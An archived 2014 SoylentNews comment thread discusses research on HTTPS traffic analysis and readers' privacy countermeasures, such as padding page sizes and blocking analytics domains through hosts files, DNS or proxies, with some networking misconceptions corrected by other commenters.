Stories
Slash Boxes
Comments

Dev.SN ♥ developers

posted by janrinok on Thursday March 06 2014, @11:17AM   Printer-friendly
from the I-can-still-see-you dept.

AnonTechie has discovered two articles that discuss the risks posed by traffic analysis of seemingly-secure HTTPS, although neither seem to be simple to carry out.

From 'Even HTTPS Can Leak Your Private Data: "HTTPS may be good at securing financial transactions, but it isn't much use as a privacy tool: US researchers have found that a traffic analysis of ten HTTPS-secured Web sites yielded "personal data such as medical conditions, legal or financial affairs or sexual orientation".

In the 28 page PDF 'I Know Why You Went to the Clinic: Risks and Realization of HTTPS Traffic Analysis', UC Berkeley researchers Brad Miller, AD Joseph and JD Tygar and Intel Labs' Ling Huang show that even encrypted Web traffic can leave enough breadcrumbs on the trail to be retraced.

This discussion has been archived. No new comments can be posted.
Display Options Breakthrough Mark All as Read Mark All as Unread
The Fine Print: The following comments are owned by whoever posted them. We are not responsible for them in any way.
  • (Score: 3, Insightful) by Kromagv0 on Thursday March 06 2014, @11:28AM

    by Kromagv0 (1825) on Thursday March 06 2014, @11:28AM (#11985) Homepage

    This shouldn't be a surprise given that it will leak the pages you visited, aka the magic metadata. I have never assumed that the browser cache, browser history, cookies, or redirects were anything but public and no one else really should either.

    --
    T-Shirts and bumper stickers [zazzle.com] to offend someone
    • (Score: 2, Informative) by Anonymous Coward on Thursday March 06 2014, @12:03PM

      by Anonymous Coward on Thursday March 06 2014, @12:03PM (#12008)

      There's a simple way to get sensitive data out of the browser history (it has to be done by the web site author, however): Use POST instead of GET to transmit that data. Then your browser history only shows which page you visited, but not what data you submitted (sometimes even the page URL may contain critical information, but in many cases it is only the specific data you sent which you want to protect; for example with searches, there's no reason to hide that you did a web search, while you may have a reason to hide what you searched for).

      However be aware that the browser may still save your search terms, e.g. in the input box history.

      • (Score: 1) by glyph on Thursday March 06 2014, @07:45PM

        by glyph (245) on Thursday March 06 2014, @07:45PM (#12315)

        At least for cross-site requests, NoScript will actually convert GET requests to POST requests browser-side. IIRC this is enabled by default.

    • (Score: 3, Interesting) by ls671 on Thursday March 06 2014, @12:06PM

      by ls671 (891) on Thursday March 06 2014, @12:06PM (#12011) Homepage

      Yes, that's why really secured links send dummy data over the link all the time to make it harder to find out when something is really happening when eavesdropping on the link. Just set up a script to send dummy data daily to the "Clinic" site and other sites you might want to use. ;-)

      --
      Everything I write is lies, including this sentence.
    • (Score: 0, Redundant) by robodog on Thursday March 06 2014, @03:49PM

      by robodog (1365) on Thursday March 06 2014, @03:49PM (#12154)

      https leaks the pages that I visit? How so?

      • (Score: 1) by bryan on Thursday March 06 2014, @07:20PM

        by bryan (29) <bryan@pipedot.org> on Thursday March 06 2014, @07:20PM (#12295) Homepage Journal

        A website owner can create a page with 1000 links to common Internet sites. JavaScript on this page can then loop through the links looking at the class identifier to see if the URI has been visited (weather the link is blue or purple) and then report back its findings to the server.

  • (Score: 5, Informative) by martyb on Thursday March 06 2014, @11:47AM

    by martyb (76) on Thursday March 06 2014, @11:47AM (#11996) Journal

    If they can do this with https-secured links, just think of what can be done with traffic analysis of unsecured links.

    Not to single them out for any particular reason but only for the sake of example, I offer you just a short sampling of some of Google's offerings:

    1. DNS service at 8.8.8.8; I'm sure every DNS lookup is recorded and analyzed.
    2. jquery caching; every page you load that references a google-hosted copy potentially gives google info on where you go. (Yes, one can reduce this with add-ons that block referer info, but how many people do that?)
    3. Search, of course, which informs them of your areas of interest.
    4. gmail, where they not only get to sift your e-mail's *contents*, but gather a list of *who* you communicate with.

    Some may think this borders on paranoia. Maybe. Then again, I can do some pretty interesting textual analyses, and I'm basically a newbie when it comes to this. They have much better tools at their disposal, both hardware and software.

    Similar things could be said about facebook, yahoo, apple, and microsoft.

    Some steps I have taken include a hosts file as well as firefox addons such as: adblock plus, do not track me, noscript, ghostery, self-destructing cookies, and better privacy.

    I commend the SoylentNews developers for their efforts to self-host any resources used and so limit some of the information that is divulged by my visiting this site.

    • (Score: 2, Insightful) by marcello_dl on Thursday March 06 2014, @02:07PM

      by marcello_dl (2685) on Thursday March 06 2014, @02:07PM (#12087)

      There is also google analytics, which is on third party sites, and is obviously able to log who visits them because it's the whole point. Try browsing with noscript and see how many times the google analytics site is blocked.

      Then there is the sites who use google webfonts which are loaded from the client. Or some javascript libraries hosted by google, as noscript shows.

      And the google acquisition of recaptcha, which means that recaptcha challenges also come from google servers and can trivially mined.

  • (Score: 4, Interesting) by Angry Jesus on Thursday March 06 2014, @12:03PM

    by Angry Jesus (182) on Thursday March 06 2014, @12:03PM (#12009)

    It looks what they are doing is building a list of the sizes of each web page and the links between the pages. They use that to make educated guesses (they got 90% accuracy) as to what pages a specific IP address visits.

    The fix on the server side is to add random amounts of padding to each web page (or if they can manage it, pad them to all have the same size).

    • (Score: 2, Interesting) by tempest on Thursday March 06 2014, @02:00PM

      by tempest (3050) on Thursday March 06 2014, @02:00PM (#12084)

      Padding seems like it could work, but I think padding them to be the same size would be a mess with HTTP compression. Assuming pages on a website generally run in a range of sizes, if you pad them randomly between those sizes with uncompromisable data it might be enough. I'm not sure that's realistic for graphics in real time though. Since this requires statistics on those elements, perhaps having a source image which is periodically recompensed to random sizes could obscure their data collection until they re-poll the entire site.

      • (Score: 2) by Angry Jesus on Thursday March 06 2014, @02:26PM

        by Angry Jesus (182) on Thursday March 06 2014, @02:26PM (#12096)

        I think it would be simpler than that. If the encrypted data contains a content-length field (iirc that's recommended, but not mandatory, for http) then just append pre-compressed garbage to the end, xor it with a new random key each time and you're golden.

        • (Score: 1) by tempest on Thursday March 06 2014, @03:27PM

          by tempest (3050) on Thursday March 06 2014, @03:27PM (#12144)

          Since it's more a matter of size than what's appended, I don't think the random xor is needed. That seems pretty doable server side though with a simple module. Just generating a big pile of shit in ram and taking random pieces of it would be pretty low overhead (aside from bandwidth and extra ram).

      • (Score: 1) by tempest on Thursday March 06 2014, @02:31PM

        by tempest (3050) on Thursday March 06 2014, @02:31PM (#12102)

        Replying to myself and thinking out loud here, this statistical analysis occurred to me a few months ago when messing around on my own site (which is mostly static) and how someone could infer what page they were visiting by studying the byte size download. Padding the actual pages didn't occur to me, so I guess you could say I'm very interested in this topic :) One thing that came to mind was one section of my site has essentially randomized banners. There's only 30 of them, but the same pages have different banners every week and they rotate between them. Taking this a step farther, if you had a collection of say, 5000 random sized images, then referenced them on the page (using style="display:none" or something), with HTTP pipe-lining the glob transfer would be hard to scrutinize. Does this sound doable?

  • (Score: 5, Insightful) by MichaelDavidCrawford on Thursday March 06 2014, @12:15PM

    by MichaelDavidCrawford (2339) on Thursday March 06 2014, @12:15PM (#12019) Homepage

    There are a lot of folks who regard the nsa metadata collection as ineffective. I don't.

    Traffic analysis was explained as follows by a consultant to the military at the Network and Computer Security tutorial I attended during the 1989 Interop Conference:

    "You don't need to decrypt anything. Just look for the tent that's sending and receiving a lot of messages. That must be the command post, eh wot? Let's see what happens if we drop a bomb on it."

    Quite commonly drug dealers and brothels are busted by observing lots of people coming and going to a place that one would not expect to get a lot of visitors.

    I am dead certain that the NSA collects most of its metadata, not through wiretapping, but through perfectly legal web and mobile analytics, say by offering free emoticons, web fonts and the like.

    This is easiest with an older rev of Safari as 35 and 43 pixel gifs, as well as 0 an 1 byte javascripts show up quite obviously in its Activity window. Now some one-pixel gifs are still used as spacers. You don't need to blackhole those. Look for servers with suspicious names like "hosted-pixel.com", or for huge long lists of query parameters in the web bug's URL.

    Drop this into your hosts file:

    0.0.0.0 hosted-pixel.com
    0.0.0.0 google-analytics.com
    0.0.0.0 www.google-analytics.com
    0.0.0.0 ssl.google-analytics.com

    In general be suspicious of any URLs that are served from any other host other than the page you are looking at.

    Analytics also breaks HTTP 1.1's chunked encoding, it causes your client and the server to set up and tear down vast numbers of TCP connections, analytics creates more routes on the internet backbone than would otherwise be the case, and uses prodigious quantities of electrical power, not only contributing to global warming, but to the release of radon gas into the atmosphere, mercury in the oceans due to burning coal and so on.

    Please someone reply with the location of the windows hosts file. It's not in the same place in every version of windows.

    Far worse is mobile analytics. The analytics services can tell where you tap on your screen whenever you run an app that has their free analytics SDK. I attended a talk on mobile analytics at a Mobile Portland meeting. One of the speakers showed a photo of her company's data center - it was big as Google's. Do you really want to be watched by an analytics service, when you're browing pr0n in the gent's room at work?

    --
    I have a major product announcement [warplife.com] coming 5:01 PM 2014-03-21 EST.
    • (Score: 2, Funny) by Anonymous Coward on Thursday March 06 2014, @01:02PM

      by Anonymous Coward on Thursday March 06 2014, @01:02PM (#12050)

      "You don't need to decrypt anything. Just look for the tent that's sending and receiving a lot of messages. That must be the command post, eh wot? Let's see what happens if we drop a bomb on it."

      A message from the enemy: "Thank you for taking out the mole. We were long seeking for him without success."

    • (Score: 0) by Anonymous Coward on Thursday March 06 2014, @01:02PM

      by Anonymous Coward on Thursday March 06 2014, @01:02PM (#12053)
      Windows XP: C:\WINDOWS\system32\drivers\etc\hosts

      Sorry, that's the only Windows box I have right now.

      Also, inb4 apk :)
    • (Score: 2, Informative) by Zinho on Thursday March 06 2014, @01:57PM

      by Zinho (759) on Thursday March 06 2014, @01:57PM (#12082)

      I'm going to apologize in advance because my response here may seem overly-harsh. You said:

      Drop this into your hosts file: <snip> Please someone reply with the location of the windows hosts file. It's not in the same place in every version of windows.

      I'm not honestly sure if you're sincere or trolling. That other news site had a dedicated single-topic troll for this, and the issue got flamed over repeatedly; my general impression was that even on boxes you control pretty well the hosts file is a bad tool for host blocking. This is especially true if you're going to use a long list of hosts, less so with shorter ones (so your suggestion may not be that bad if you don't take it further). There were reports of many different problems on Windows with the Hosts file, not the least of which was that the system would simply ignore it. In fact, "hosts file" was the top autocomplete option in Google when I typed in "windows ignores ".

      I may also have to take issue with your choice of dummy IP address. My understanding is that the 0.0.0.0/8 block is for broadcast messages to the local net. I'm not sure what exactly happens when you issue a GET request from your browser to an IP address in that range, but there's a chance that it will behave oddly; in theory, the request will get sent to every host on your subnet. If any networking geeks want to fill in that gap in my knowledge please do so. It's probably better to use your own loopback address, 127.0.0.1 (actually, anything in the 127.0.0.0/8 should work the same).

      That all being said, there's merit to the simplicity of your advice. A DNS service running on localhost is more effective, but more complex to operate (and may bother your network admin if you misconfigure it. On Linux its possible to configure IPTables to do the same job, and there are block lists published for that specific purpose [yoyo.org]; more robust than the hosts file, but still requires some arcane knowledge. An HTTP proxy is probably a better solution for a workstation/home computer (Squid [squid-cache.org] is a good choice - it's cross-platform, and GPL), but will still take some configuration. If you're willing to go whole hog with host blocking, though, the extra time to do it right is probably worth it to you.

      • (Score: 3, Informative) by etherscythe on Thursday March 06 2014, @02:16PM

        by etherscythe (937) on Thursday March 06 2014, @02:16PM (#12088)

        Correct, in particular Windows 8 is known to remove entries for certain common domains from the hosts file. Additionally, IP addresses are IIRC the multicast address when ended with .0. All 0's may be multicast to all available networks; my knowledge is a little fuzzy on that edge of things.

        On the other hand, for what it's worth, Spybot Search & Destroy used the hosts file for its "inoculation" feature. For basic usage it seems to work well, but I rarely have more than a dozen entries in there (I prefer to blacklist in NoScript/NotScripts).

        • (Score: 1) by isostatic on Thursday March 06 2014, @04:08PM

          by isostatic (365) on Thursday March 06 2014, @04:08PM (#12169)

          Additionally, IP addresses are IIRC the multicast address when ended with .0. All 0's may be multicast to all available networks; my knowledge is a little fuzzy on that edge of things.

          No, Multicast addresses are class D addresses, 224.0.0.0 to 239.255.255.255 inclusive.

          Broadcast addresses are the top of the subnet, as well as 255.255.255.255 (which is special). Network addresses are the bottom of the subnet. If I had a host "8.8.8.8" with a net mask of "255.0.0.0", my network address is 8.0.0.0, my broadcast address is 8.255.255.255, my allowed host addresses run from 8.0.0.1 to 8.255.255.254.

          That means that 8.8.0.0 would be a valid host address. Most people would assume that something ending in .0 would be a network address, which it is, unless you have a subnet > 256 hosts (So a /23 or smaller).

          Now I've rarely seen the need for a real subnet larger than a /24, but if you're working on private ranges like 10.0.0.0/8, you could have subnets coming out of your ears.

          The only thing I could think of would be if you had a large wireless network, with hundreds or thousands of clients, and wanted them to be able to roam anywhere. None of my networks approach that size, I haven't got a DHCP range more than 50, and I suspect that there are better ways of managing networks that size rather than dropping your APs on the same subnet.

          It's a fair bet that on the internet you won't see a host address ending in .0

          (Naturally this is all IPv4, none of that ipv6 voodoo)

          Any network experts able to tell me what is supposed to happen if I send a packet to a network address? So I'm on 1.1.1.1/24, I send a packet to 1.1.1.255 and it goes to all hosts on the subnet. If I send it to 1.1.1.0, what happens?

          • (Score: 1) by MichaelDavidCrawford on Thursday March 06 2014, @06:31PM

            by MichaelDavidCrawford (2339) on Thursday March 06 2014, @06:31PM (#12263) Homepage

            I attended the 1989 Interop Network and Computer Security Tutorial. One of the other students asked our instructors whether he could do anything about the fact that UNIX user IDs were only sixteen bits. The instructors replied that nothing could be done.

            "May I ask who you work for?"

            "Motorola."

            Now that was 1989. Here in 2013, I _think_ linux has 32-but UIDs.

            Apple, Inc. has something like 90,000 employees, probably twice as many temps and contract programmers.

            Now you really don't need them all on the same subnet, but there are some advantages to doing so.

            --
            I have a major product announcement [warplife.com] coming 5:01 PM 2014-03-21 EST.
      • (Score: 2) by Foobar Bazbot on Thursday March 06 2014, @02:34PM

        by Foobar Bazbot (37) on Thursday March 06 2014, @02:34PM (#12105)

        Note that he (and APK) recommended 0.0.0.0, which as the lowest address in the block should be the network address rather than a valid host address, so I agree there's a chance it will behave oddly, but I don't think your "in theory" is correct. (But I'm no IP guru, could be wrong here. I didn't even know what 0.0.0.0/8 was till you mentioned it.)

        Anyway, APK's not entirely wrong -- which is, of course, pretty much key to being a successful troll. While it's an inelegant method, it does work pretty well; as long as all you want done is per-host blocking (rather than regex blocking, typo correction, page mangling, etc.), there's really no benefit there to justify switching from an existing hosts-file setup to anything else. Additionally, it has particular benefit for systems which periodically grab an axe and run around playing Lizzy Borden with your processes (yes, I'm speaking of Android), as it doesn't involve a running process and thus is immune to hiccups from that.

      • (Score: 1) by isostatic on Thursday March 06 2014, @03:11PM

        by isostatic (365) on Thursday March 06 2014, @03:11PM (#12133)

        If you're willing to go whole hog with host blocking, though, the extra time to do it right is probably worth it to you.

        No, it's not. I have a dozen or so entries in my hosts file, for times when DNS isn't available, for autocomplete on ping and ssh, etc.

        I also have a dozen or so domain names that have annoyed me by being slow to load. Doubleclick for example, that all get directed to 127.0.0.1

        There were reports of many different problems on Windows with the Hosts file, not the least of which was that the system would simply ignore it.

        And why would this interest the typical SN reader?

        • (Score: 0) by MichaelDavidCrawford on Thursday March 06 2014, @06:35PM

          by MichaelDavidCrawford (2339) on Thursday March 06 2014, @06:35PM (#12266) Homepage

          ... I finally found someone who actually knew who Edward Snowden was. That's why he only wants cash when reloading my phone.

          So I turned him on to hosts file blocking of Analytics.

          The manager at the cafe I'm hanging at, she's a long way from editing her hosts file, so I just turned her onto Windows 7: the Missing Manual. I'll find some way to ensure she has a clueful friend, then have her hand-deliver a note about blackholing analytics servers to that friend.

          While you run linux or bsd or solaris or openVMS, I expect your aged grandmother runs windows. You would do her a service to help her protect her privacy.

          --
          I have a major product announcement [warplife.com] coming 5:01 PM 2014-03-21 EST.
      • (Score: 1) by MichaelDavidCrawford on Thursday March 06 2014, @06:23PM

        by MichaelDavidCrawford (2339) on Thursday March 06 2014, @06:23PM (#12254) Homepage

        No I'm not trolling. I'm getting ready to do a KickStarter campaign to fund newspaper and radio ads to advise the voters in the upcoming midterm elections here in the US to defeat both web and mobile analytics. This because the Associated Press recently reported that it is expected there will be widespread use of individually-targeted political ads on television, as a result of TVs, DVRs and so on reporting their own analytics back to your cable provider.

        That is, if comcast knows that you watch Fox New all day long, you'll be getting lots of requests to donate to the Republican Party and its candidates.

        I'd rather chew my own foot off than watch Fox News, but if I did watch Fox News, I'd just see the usual ads for consumer products.

        What that AP reported did not clue into, is that most Americans get their Internet from their Cable TV provider. So Comcast, Time Warner and friends, they all know what sites you hang out. Even if you don't have the kind of DVR or TV that phones home, your web browser does.

        That's also why, as you pointed out, that one does well either to operate one's own nameserver, or use that of a technically-inclined friend.

        A year or so ago I configured the DNS for my Mom's iMac to use Level 3's "opt out" nameservers: 4.2.2.1, 4.2.2.2, 4.2.2.3 and 4.2.2.4. That worked great, as her default EarthLink nameservers that were configured via DHCP "provided" that broken DNS that presented web search whenever a name lookup failed.

        GET THIS:

        Starting just this last Sunday, those "opt out" nameservers from Level 3, now provide broken DNS and a search page. I am totally flummoxed that a respectable outfit like Level 3 Communications would stoop so low. I expect EarthLink got wind that lots of its users had opted out, maybe threatened to go with another provider.

        I haven't looked into it yet, but I expect that only happens when one uses 4.2.2.x when one is an EarthLink customer. I expect they don't do the broken DNS if one comes from some other ISP.

        I apologize, I should have know better than to recommend 0.0.0.0 to absolutely everyone. I used to do SQA for Apple's MacTCP, I wrote a whole new test tool in C++, a new test plan that was one hundred pages long, I used to go over packet dumps with a highlighter and the RFCs to ensure that our IP-in-AppleTalk encapsulation was correct, as our sniffer couldn't decode it.

        But that was over twenty years ago.

        The reason I don't use 127.0.0.1 is that it chokes the logs on my Mac.

        I had tried 127.0.0.2, expecting an immediate RST, but what I got were long waits followed by a timeout.

        A long hosts file is not a problem on a modern Mac. I expect it would not be on *NIX but I can see how it would be on Windows.

        Really what would be a lot better for everyone, would be a patch to the library that does gethostbyname and friends.

        Another aim of my KickStarter campaign, I don't want my aged mother trying to edit her hosts file with sudo, so I'm going to write some code to make this a lot easier.

        To backhole Mobile Analytics, one must jailbreak one's device. For iOS, I could put a free App in the Cydia App Store. For Android, I expect the CyanogenMod folks would be down with including it.

        --
        I have a major product announcement [warplife.com] coming 5:01 PM 2014-03-21 EST.
        • (Score: 0) by Anonymous Coward on Friday March 07 2014, @12:13PM

          by Anonymous Coward on Friday March 07 2014, @12:13PM (#12751)

          I used to do the same things as you. I gave up and got the 99% solution. I use adblock and noscript.

          However, if you want to continue to use hosts files I suggest something different. Your own DNS server, and your own http server. I ran straight into the same issue you did. 0's is not 'right' and 127 is slow on timeout. So what I did was picked the sites I wanted to blackhole and have the dns server just return an address that serves up a 1x1 gif. Then inside of a squid server I would look for http urls that fit patterns.

          The nice part of having your own DNS server is you can change who your upstream is fairly easily. There are about 20-30 you can choose from. Stay away from the root level domains as they tend to be slow.

          This all however, has drawbacks too. As some sites expect to get javascript back and it ends up borking up some browsers in about the same way noscript does.

          Also those 4 you have? That is a woefully short list. There are *thousands* of analytic companies out there. All of the ad networks run similar services too.

          I honestly got tired of chasing it so went to a much simpler solution of adblock. However, the drawback to this is I now depend on the mercy of others to get the 'blacklist' right.

          I am borderline to the point of just going 'whitelist'. But even that is a pain.

          I used to use this one
          http://winhelp2002.mvps.org/hosts.htm [mvps.org]
          and another one that name escapes me now.

          I would use those as the base for what I was trying to do.

          The massive problem with hosts file is it is trivial for the end site to work around

          Lets say you serve up tracking cookies from cookie.somesite.com

          You figure out people are blocking cookie.somesite.com. So you just change cookie to ab83s83.somesite.com and change the ab83s83 to xyz123 the next time you visit. So you end up filing your hosts file with tons of site names that will never even exist again. Just blocking 0.0.0.0 somesite.com from the hosts file does not work either. Host file lookup does not work that way. As the xyz123.somesite.com will still resolve.

          Good luck with whatever you come up with though. I personally got tired of chasing the dragon :(

    • (Score: 4, Insightful) by davester666 on Thursday March 06 2014, @02:38PM

      by davester666 (155) on Thursday March 06 2014, @02:38PM (#12107)

      > There are a lot of folks who regard the nsa metadata collection as ineffective. I don't.

      No, that's not correct. Lots of people regard the nsa metadata collection as ineffective at finding terrorists. It is quite effective at finding other criminal behaviour, which the NSA was secretly/now openly passing to the FBI.

      • (Score: 1) by MichaelDavidCrawford on Thursday March 06 2014, @06:27PM

        by MichaelDavidCrawford (2339) on Thursday March 06 2014, @06:27PM (#12258) Homepage

        Not because of the fourth amendment.

        I'm tired so I can't deal with looking it up just now, but my understanding is that the US Military is specifically forbidden from performing strictly civilian law enforcement. I understand that's why we have a separate US Coast Guard, as well as why the Coast Guard is a branch of Homeland Security rather than DoD.

        --
        I have a major product announcement [warplife.com] coming 5:01 PM 2014-03-21 EST.
        • (Score: 2) by davester666 on Thursday March 06 2014, @11:02PM

          by davester666 (155) on Thursday March 06 2014, @11:02PM (#12439)

          Oh no, it's totally illegal. The NSA and FBI know it too, because there were explicit instructions with the information, namely, don't tell anybody where you got it, and claim you started the investigation based on other information you uncover during the investigation.

          A FISA judge found out about part of it, and evidently all he can do is write the NSA a strongly worded letter saying to stop doing it. Yeah, sure they will if that's the only punishment they get...